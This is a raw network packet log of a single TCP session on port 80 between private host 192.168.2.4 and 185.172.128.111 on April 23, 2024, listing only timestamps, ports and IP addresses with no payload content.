Apr 23, 2024 09:26:58.223876953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223886967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223901987 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223922968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223934889 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223959923 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223988056 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223994970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224024057 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224031925 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224057913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224067926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224081039 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224123001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224157095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224169970 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224170923 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224194050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224205017 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224230051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224244118 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224268913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224277973 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224303961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224318027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224339008 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224358082 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224374056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224396944 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224411964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224435091 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224451065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224464893 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224487066 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224515915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224522114 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224534988 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224558115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224581003 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224592924 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224611044 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224628925 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224648952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224663973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224690914 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224699974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224711895 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224736929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224754095 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224772930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224788904 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224807978 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224831104 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224843025 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224850893 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224879026 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224895954 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224915028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224941015 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224951029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.224962950 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.224987984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225006104 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225025892 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225044012 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225063086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225070953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225099087 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225112915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225133896 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225163937 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225171089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225184917 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225207090 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225224972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225241899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225263119 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225276947 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225295067 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225312948 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225332022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225347996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225370884 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225383043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225394964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225419998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225438118 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225455046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225476980 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225490093 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225507021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225526094 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225543976 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225560904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225585938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225596905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225604057 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225632906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225647926 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225671053 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225688934 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225707054 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225735903 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225744963 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225758076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225783110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225802898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225819111 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225837946 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225855112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225872993 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225891113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225904942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225927114 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225941896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.225964069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.225982904 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226000071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226028919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226044893 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226067066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226080894 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226098061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226118088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226135015 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226154089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226175070 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226190090 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226217985 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226226091 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226249933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226263046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226274014 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226300001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226320028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226336002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226367950 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226371050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226407051 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226428032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226443052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226476908 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226499081 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226511955 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226525068 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226547003 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226582050 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226593971 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226617098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226638079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226651907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226681948 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226690054 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226725101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226726055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226746082 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226761103 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.226788044 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.226825953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.432665110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.432720900 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.432759047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.432768106 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.432796001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.432816982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.432816982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.432837009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.432854891 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.432873964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.432893991 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.432909012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.432934999 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.432948112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.432971954 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.432984114 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433006048 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433020115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433036089 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433057070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433077097 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433103085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433119059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433139086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433157921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433176041 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433191061 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433212042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433226109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433248043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433267117 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433284044 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433310032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433320045 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433336020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433357000 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433372974 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433392048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433413982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433428049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433442116 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433465004 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433480024 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433518887 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433522940 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433554888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433573961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433590889 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433605909 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433625937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433641911 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433664083 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433681011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433698893 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433712006 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433733940 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433748007 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433769941 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433789015 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433805943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433823109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433841944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433861017 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433877945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433896065 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433913946 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433928013 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433948994 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.433968067 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.433984995 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434000015 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434020042 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434035063 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434056044 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434071064 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434089899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434106112 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434125900 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434154987 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434159994 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434180975 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434196949 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434207916 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434232950 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434247971 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434267998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434288025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434303045 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434319019 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434338093 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434355021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434374094 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434387922 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434410095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434426069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434444904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434459925 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434479952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434500933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434516907 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434529066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434554100 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434571028 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434591055 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434606075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434624910 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434643984 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434660912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434674978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434696913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434731007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434761047 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434767008 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434772968 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434803009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434803963 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434823990 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434839010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434851885 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434874058 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434889078 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434910059 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434927940 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434945107 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434956074 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.434981108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.434998035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435017109 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435036898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435051918 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435066938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435086012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435102940 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435122013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435138941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435157061 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435175896 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435194016 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435209036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435229063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435246944 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435265064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435300112 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435312033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435327053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435334921 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435353994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435373068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435389996 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435408115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435431004 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435446978 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435465097 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435482979 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435502052 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435518980 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435548067 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435554028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435585976 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435590029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435611963 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435626030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435641050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435662031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435678959 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435697079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435714006 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435731888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435750961 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435767889 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435785055 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435802937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.435825109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.435838938 CEST	80	49730	185.172.128.111	192.168.2.4
